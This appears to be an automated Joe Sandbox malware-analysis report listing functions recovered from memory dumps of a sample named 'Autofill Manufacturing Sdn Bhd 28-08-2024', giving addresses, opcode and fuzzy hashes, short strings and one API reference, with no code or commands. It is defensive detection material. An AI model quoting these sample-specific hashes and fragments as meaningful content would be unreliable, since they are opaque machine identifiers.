Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID: ,q$,q
API String ID: 0-1667412543
Opcode ID: 2f78472f0abe09ee28feccebef1b40b524a7761b1b63cd58e15ebcf3da60362e
Instruction ID: 7252a50211ff999eeea9e3e360802628119faade2cba6c810685398b397564f8
Opcode Fuzzy Hash: 2f78472f0abe09ee28feccebef1b40b524a7761b1b63cd58e15ebcf3da60362e
Instruction Fuzzy Hash: 7981AF34A00505CFDB58CFBDC484AADBBF2BF89200B9D81A9D586DB365DB32E841CB50

Function 010A3CC0 Relevance: 2.6, Strings: 2, Instructions: 112COMMON

Download Yara Rule

Strings

Xq, xrefs: 010A3CCD
Xq, xrefs: 010A3CF6

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID: Xq$Xq
API String ID: 0-1556399337
Opcode ID: 1960941b3f05742bcd1259f3eb2bcacaf59d764973ddd3d7f63a3c4d5dadb759
Instruction ID: 38bc1fb2b1834cb8738ed61c0a5a82c96ab9b0ee6e440edee625af44f9c1e1bd
Opcode Fuzzy Hash: 1960941b3f05742bcd1259f3eb2bcacaf59d764973ddd3d7f63a3c4d5dadb759
Instruction Fuzzy Hash: 1C31C831704325CBEF6866E9689537E65E6BBC4200F984439D897CB384DBB5CC4447D1

Function 010A8EF8 Relevance: 2.6, Strings: 2, Instructions: 108COMMON

Download Yara Rule

Strings

$q, xrefs: 010A8FD7
$q, xrefs: 010A8FB4

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID: $q$$q
API String ID: 0-3126353813
Opcode ID: 51258c5d8e8bf2cedf2bf7908d8c23f98313321b524457e28219719f9ee459b4
Instruction ID: 2989d133aead2798e4318fe10f3cd15f5cd6b9091ba1bd19b55cd99e555eda27
Opcode Fuzzy Hash: 51258c5d8e8bf2cedf2bf7908d8c23f98313321b524457e28219719f9ee459b4
Instruction Fuzzy Hash: 0F31D8303042538FD7364BBDCC5467E7BAAAF8530279484ABF2C2CB296DA29CC408755

Function 010A9D59 Relevance: 2.5, Strings: 2, Instructions: 44COMMON

Download Yara Rule

Strings

4'q, xrefs: 010A9D6D
4'q, xrefs: 010A9D84

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: ad51bfe8183acbd94744d8f381672febd960b609b6457c1000ff787fc1468725
Instruction ID: 6a13dfbc3b4ba7bde6ba7fdaf264bf4b09fe1a8f908a6686dbaaea2aa2f263be
Opcode Fuzzy Hash: ad51bfe8183acbd94744d8f381672febd960b609b6457c1000ff787fc1468725
Instruction Fuzzy Hash: 9FF06D753002156FD7192BE598506BB7BDBEFDC350B548439BA49C7350ED71CC518790

Function 010A0C8F Relevance: 1.8, Strings: 1, Instructions: 546COMMON

Download Yara Rule

Strings

LRq, xrefs: 010A0F19

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID: LRq
API String ID: 0-3187445251
Opcode ID: 34333d8f679a7929293aa10b93d1e12b232904565c5aaf83b9edf09865e74543
Instruction ID: 4c259a127edc91943b712a4650c888644546c2e0c01f6ed94a58fc4aa2b31f35
Opcode Fuzzy Hash: 34333d8f679a7929293aa10b93d1e12b232904565c5aaf83b9edf09865e74543
Instruction Fuzzy Hash: 7452F975E00219CFCB64EF64E994B9DBBB2FB88301F1085A9D45AA7358DB706D81CF60

Function 010A0CA0 Relevance: 1.8, Strings: 1, Instructions: 539COMMON

Download Yara Rule

Strings

LRq, xrefs: 010A0F19

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID: LRq
API String ID: 0-3187445251
Opcode ID: 8a3acce90f6c7ca457f5a0474ceca8aff82e391110da962419e873c87a7a7bf2
Instruction ID: 4457531362dfe85810d8e289fd6455c01ec3a7360621979ae74c4964c506ee84
Opcode Fuzzy Hash: 8a3acce90f6c7ca457f5a0474ceca8aff82e391110da962419e873c87a7a7bf2
Instruction Fuzzy Hash: 0A52D975E00219CFCB64EF64E994B9DB7B2FB88301F1085A9D45AA7358DB705D81CF60

Function 0692992C Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 06929A6E

Memory Dump Source

Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d76d41713beef0ef5dbab12d201399f2d194c8a34e9f8614b7d548ca4ee2e443
Instruction ID: b46ac31ddd028f0efb8c29a097fcdf1152e0aa5e8c1f7c2ff269afe1bc309522
Opcode Fuzzy Hash: d76d41713beef0ef5dbab12d201399f2d194c8a34e9f8614b7d548ca4ee2e443
Instruction Fuzzy Hash: DA114F74E0021A8FEB44DFE9D884AEDB7F9FF88314F548155E844A7649D7349D41CB50

Function 010AE007 Relevance: .7, Instructions: 652COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e29f63cfa32d6e85cff1136c59c4e8427019ec6d43f5c6846cc885cc6126aac7
Instruction ID: ed800abd33019989293b1074601c87324a85352fd2dce5016c99cb7b06d65f18
Opcode Fuzzy Hash: e29f63cfa32d6e85cff1136c59c4e8427019ec6d43f5c6846cc885cc6126aac7
Instruction Fuzzy Hash: FD1296340212878FE3602B64E6AC16BBF66FB5F363314AD11B58FC1059DB7E14899F26

Function 010AE018 Relevance: .6, Instructions: 647COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b83d79553f515ef702e5dba6285d4bcda27556798543da0fcccb6c735896a824
Instruction ID: ff6027f6ee1600621b3c7eef155851709450ccd4c99b9e995ed2f39dc18e2b95
Opcode Fuzzy Hash: b83d79553f515ef702e5dba6285d4bcda27556798543da0fcccb6c735896a824
Instruction Fuzzy Hash: 181285340212878FA3602B64E6AC16BBE66FB5F363314AD11B58FC1059DB7E14899F26

Function 010A80D8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3968aec1ba9e5309c494738dd97561dff6ccb235e6818469d11561ec71c8ef34
Instruction ID: 0bb584ffaf3af1c402dcc0a59f3356704d1d12b75e1c94796c82c816c2ddbef8
Opcode Fuzzy Hash: 3968aec1ba9e5309c494738dd97561dff6ccb235e6818469d11561ec71c8ef34
Instruction Fuzzy Hash: B1716B343006058FDB65DFACC888ABE7BE5AF49242F5580AAE986CB371DB75DC41CB50

Function 010AF71F Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 256e961a20e7233221335536cd147d7bb48ad923c23d4d40b7fab8203bbd7f40
Instruction ID: d1744361f79d4e3f1d6eb56df2a6cb221a96adc16fc14f2f6e0ba858002407ca
Opcode Fuzzy Hash: 256e961a20e7233221335536cd147d7bb48ad923c23d4d40b7fab8203bbd7f40
Instruction Fuzzy Hash: 42611070D01319DFDB14DFA4D888BADBBB2BF89300F608129D845AB294DB755986CF40

Function 010AD548 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2a1b53d72ca8df4ec6a303465ed2c6caea8f2ed5df9ce50624e9ea5820b43b7
Instruction ID: 52aa8cb8cb4cf728a03fd77afa2a8750972c9dda38024e576828c8397b40b860
Opcode Fuzzy Hash: d2a1b53d72ca8df4ec6a303465ed2c6caea8f2ed5df9ce50624e9ea5820b43b7
Instruction Fuzzy Hash: 4551A374E01218DFDB48DFA9D984ADDBBF2BF89300F249169E819AB364DB309901CF50

Function 010A41A0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c64a5f202ea70665ab0573adaff11e947fd3892ed51d11e988184b403b245fb3
Instruction ID: 288bec343958ba747f2e0850226718df99ad74309cae202b3b0a30e56cc6e2b6
Opcode Fuzzy Hash: c64a5f202ea70665ab0573adaff11e947fd3892ed51d11e988184b403b245fb3
Instruction Fuzzy Hash: 13519175E01308CFCB48DFA9D59499DBBF2FF89300B609469E815AB368DB35A842CF50

Function 010AA303 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 925b84b5f704444b07d50337b5c497ada999395e7b75a8d58524deb9ad95f3a6
Instruction ID: 5815eff5796e612989dd76be1b07338faf067948ba2dc35d02ebdf7d8906e66a
Opcode Fuzzy Hash: 925b84b5f704444b07d50337b5c497ada999395e7b75a8d58524deb9ad95f3a6
Instruction Fuzzy Hash: EB41C131B00249DFCF12CFA8C844A9EBFF2AF89350F448195F9859B292D775D814CB50

Function 010A9C30 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e4ce98cb1185d1d32ba71d4abc647aff851be78a6fab881b775a097297cc41e
Instruction ID: a8029d9f3493d73444725d05ac60c6fb755a0570beb2ccd432c3d5beb002e43e
Opcode Fuzzy Hash: 4e4ce98cb1185d1d32ba71d4abc647aff851be78a6fab881b775a097297cc41e
Instruction Fuzzy Hash: 8E4172307002558FDB41DF58C844B6A7BF6EF49318F8484A6E958CF256D775DC41CBA2

Function 010A5658 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46c842204b9fbd2b0a4a73839ae784b0dc25f6a4da1c8daa425627b65d433e73
Instruction ID: 4a8ab6500f034860d028d640e35f937b8b5ca132a73c25057647cd53a589ab94
Opcode Fuzzy Hash: 46c842204b9fbd2b0a4a73839ae784b0dc25f6a4da1c8daa425627b65d433e73
Instruction Fuzzy Hash: 9231C571300119DFCF159FA8E895AAE7FA2FB88340F004029F9959B354CB39D961DFA0

Function 010A8380 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 634ad7a9c287bdb0ffe17b9ceff54aac7ba096e161e53f758f4dfac7999aa67b
Instruction ID: 29b723ab2ae03f0e2fec6c610792662e57c4efb64cd45fcac41991b38e209680
Opcode Fuzzy Hash: 634ad7a9c287bdb0ffe17b9ceff54aac7ba096e161e53f758f4dfac7999aa67b
Instruction Fuzzy Hash: 8E21B0303046108BEB2557ADC45473E3696AFC474AF98C07ED582CB799EE7ACC429781

Function 010A2790 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0751b41ce928b312a3cd8733d049316aca365671497888466af8f4a1cacfac92
Instruction ID: e07bc50e66fef72199be1f61919de56dc2d4ff542fa9e65e48f97a022f29f4ce
Opcode Fuzzy Hash: 0751b41ce928b312a3cd8733d049316aca365671497888466af8f4a1cacfac92
Instruction Fuzzy Hash: 16313474D052498FCB41DFB8D9442EEBFF1EF4A300F0441AAD485B7224EB351A85CBA2

Function 010A28F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06eb92829e056ffa7ddecd5c66d289b4b2d43adbbda4c63ace5160f0931ea2e8
Instruction ID: 6991aa5e52b831fa916be7efbbd06b4ae269ef5c35fec1647d94381340a78f22
Opcode Fuzzy Hash: 06eb92829e056ffa7ddecd5c66d289b4b2d43adbbda4c63ace5160f0931ea2e8
Instruction Fuzzy Hash: 8721AF35A00204AFCB55DFA8C440AAE3BA5EB9D7A0B50C579D85A9B344DB30EE46CBD1

Function 010A6300 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddf857050a68e35deedb7687d73fb4ba25152548873d2f0563af3ec0ca906b6e
Instruction ID: 39eab999dbed9cadcfa1de781a6948bfad895f76e9899c5bee958e819459049a
Opcode Fuzzy Hash: ddf857050a68e35deedb7687d73fb4ba25152548873d2f0563af3ec0ca906b6e
Instruction Fuzzy Hash: 8921F3363006218FC7259B6DC49492EB7A2FFC97517488079E986CB398CF32DC028B80

Function 0105D044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3734653959.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_105d000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 031e632488d780f198f49f42583065f680665c5bdcdbf9d6276443330082249f
Instruction ID: fb0387f122dc8f3d7ae2ba4d3d7649da4c0c43e5193b09bd9d4fc15f71bf36de
Opcode Fuzzy Hash: 031e632488d780f198f49f42583065f680665c5bdcdbf9d6276443330082249f
Instruction Fuzzy Hash: 2F212571504204EFDB95DF94C8C0B27BBA5FB84314F24C5AEED890B242C736D846CB62

Function 010A5649 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f63bd7e8dd2f42661cd91bf38e00836f52b1f261c5a2a811967786903bca30c
Instruction ID: d67d4e1e1645e2d8a38496b9f88a56a27c52337d191d4c1e75ebe82335648183
Opcode Fuzzy Hash: 1f63bd7e8dd2f42661cd91bf38e00836f52b1f261c5a2a811967786903bca30c
Instruction Fuzzy Hash: E82123716041599FCB159FA8E8956AE3FA1FB89310F004069F8C58B359CB38DD51CFA0

Function 010A4285 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea9281d414423ab5f40e54b0130ffdc69ae08fb7726b481ed86f65177ec0056c
Instruction ID: 568cdd147a5551c056ed7bb595d2e9b161604b3368d1b7b420d16cb8db53ab1e
Opcode Fuzzy Hash: ea9281d414423ab5f40e54b0130ffdc69ae08fb7726b481ed86f65177ec0056c
Instruction Fuzzy Hash: DD318379E01308CFCB44DFA8D59499DBBB2FF49301B608469E819AB368D731AD41CF50

Function 010A9761 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f92320c400a67cd25f4b560486fe7966bfc4231a4333d99f7587025bd94044c
Instruction ID: bdc02b8587bdb1a6e4fa61990d24960f9459438c3088fb5630a64d2a545eb4ce
Opcode Fuzzy Hash: 6f92320c400a67cd25f4b560486fe7966bfc4231a4333d99f7587025bd94044c
Instruction Fuzzy Hash: BA21AD30E00248DFDB15CFE5D580AEEBFB6AF48208F148069E450A6394CB31E941CF60

Function 010A62F0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c889161fb3ba2a8c983a3697f0b93a97c416fa38926ca5e521d7daff6186f359
Instruction ID: 6ac971c9255c2772c18c443f2558138daf5cc4a6e594edf678cc7d83f1b31175
Opcode Fuzzy Hash: c889161fb3ba2a8c983a3697f0b93a97c416fa38926ca5e521d7daff6186f359
Instruction Fuzzy Hash: BA11C1363046119FD7158B6DD46452E7BB2BFC939130880A9E586CB364CF32DC028B90

Function 010AF640 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cce0ee01035df59da977c83fb1b655294d88ccb624195365c677a00625bdbd65
Instruction ID: b5b2fc3ff9046dd9e347c1777b3ef83feadc14748eb261a44d8961a9572cf971
Opcode Fuzzy Hash: cce0ee01035df59da977c83fb1b655294d88ccb624195365c677a00625bdbd65
Instruction Fuzzy Hash: 4E216DB0D0030A9FEB45EFA9D54078EBBF2FB45300F40C5AAC194AB368E7745A459F91

Function 010A27F0 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2373a2d4bf12eb1d168fe83e84cdbfee15674ad6057d756d4364b86e0d8f7a7
Instruction ID: b0f8c0007d2868429abc929a4ac7df0f83ecc3d644e4a090534948e278d71f42
Opcode Fuzzy Hash: c2373a2d4bf12eb1d168fe83e84cdbfee15674ad6057d756d4364b86e0d8f7a7
Instruction Fuzzy Hash: DC21E075C0524A8FCB40EFB8D9445EEBFF0AF0A300F1051AAD845B2224EB365A94CFA1

Function 010AF650 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9839275bfddd52581bdb4846f0f53dfb8e881f0f2f49c6cafdf647d05ea67af
Instruction ID: db437ef8e6ebd6b4167da2ef2138bb7ef811327843b8250000763a321e18bcc6
Opcode Fuzzy Hash: b9839275bfddd52581bdb4846f0f53dfb8e881f0f2f49c6cafdf647d05ea67af
Instruction Fuzzy Hash: F2116AB0D0020A9FEB44EFA8D54078EBBF2FB84300F40C5A9C1949B328EB745A458F91

Function 0105D03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3734653959.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_105d000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
Instruction ID: 2327a349e43b95f4b8a254a2e8185d73e75bf28c34dbb117639c01d50fe0dfd8
Opcode Fuzzy Hash: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
Instruction Fuzzy Hash: 9911BB75504284DFDB52CF54C9C4B16BBA2FB84314F28C6AAEC894B656C33AD44ACF62

Function 010A5E98 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f545ca8b7ce70cc23ac71756aaf5f5cabc3618fb44a162d2f8ab0227659c4a1
Instruction ID: e033436dc717fb62eedbe78c86363a527d045d6305cb78b79e194086f14690c2
Opcode Fuzzy Hash: 9f545ca8b7ce70cc23ac71756aaf5f5cabc3618fb44a162d2f8ab0227659c4a1
Instruction Fuzzy Hash: E901F9316002156FC7268F94DC1199E3FA6FBC9790F488165F995CB284CE758D159B90

Function 010AABE0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f58cc93193dd670748be9fbe424f579815e79d41fa1b7f1afad0ecaab4cece73
Instruction ID: 36e51cac51d9701515364c1b7557655edf34f47252031fd943e5516f8456cec5
Opcode Fuzzy Hash: f58cc93193dd670748be9fbe424f579815e79d41fa1b7f1afad0ecaab4cece73
Instruction Fuzzy Hash: 13F09C31300614CFE7266A6ED85462EBADEEFC8E5539540B9E545CB3A6EE21CC03C790

Function 010AE8E8 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc414fc331320c1079c5ad2f5103b37589dbbaef586646a4a7e30de0dac43ad9
Instruction ID: 45a2710b907cdc0681a515948e9f6749aa878fa04c79b9674f903f5e8bb93a97
Opcode Fuzzy Hash: bc414fc331320c1079c5ad2f5103b37589dbbaef586646a4a7e30de0dac43ad9
Instruction Fuzzy Hash: 2B112979D0430ADFDB41DFA8D8445AEBBB1FB89300F4081A6D920E3354D7755A59CFA1

Function 010A9C23 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98c8a5c7e60d26ba469cd47afa96dd4d7bfb2ae024232f52dc30c075fa88667e
Instruction ID: 83ff1ada2230ae220af97dde1d75baeba06e86ab712451a890a2644ff43c4207
Opcode Fuzzy Hash: 98c8a5c7e60d26ba469cd47afa96dd4d7bfb2ae024232f52dc30c075fa88667e
Instruction Fuzzy Hash: 42F09032A042589FDB419F68D808AEABFF5EF89324F0580A7E548CB251D3314955CB91

Function 010AAF5B Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16a68d19ad486ee47c2e5c669278f283785330ed216188050545b2e18dfa1b7a
Instruction ID: ef3024ba2bdf2b979a4ad15e2a1145fc84e8aed5eb499986d14c2e616481ecd0
Opcode Fuzzy Hash: 16a68d19ad486ee47c2e5c669278f283785330ed216188050545b2e18dfa1b7a
Instruction Fuzzy Hash: 9FF03076644244EFCB11DF94EC40ADDBBB2FF8C321F184096EA11AB2A1C2319815CB60

Function 010A6739 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b57c37bda7ed3a79964666605ec613c546a86b42d57d614aa14a82324657712e
Instruction ID: fea41193cf168b44cf5d4db2e903f63f4632292662bc9eb319816b16d9a4eb20
Opcode Fuzzy Hash: b57c37bda7ed3a79964666605ec613c546a86b42d57d614aa14a82324657712e
Instruction Fuzzy Hash: 6DE0C2310083864FC703FB30E8691447F3ABA83100B8890A1D0864F19ADEB8588A8BB6

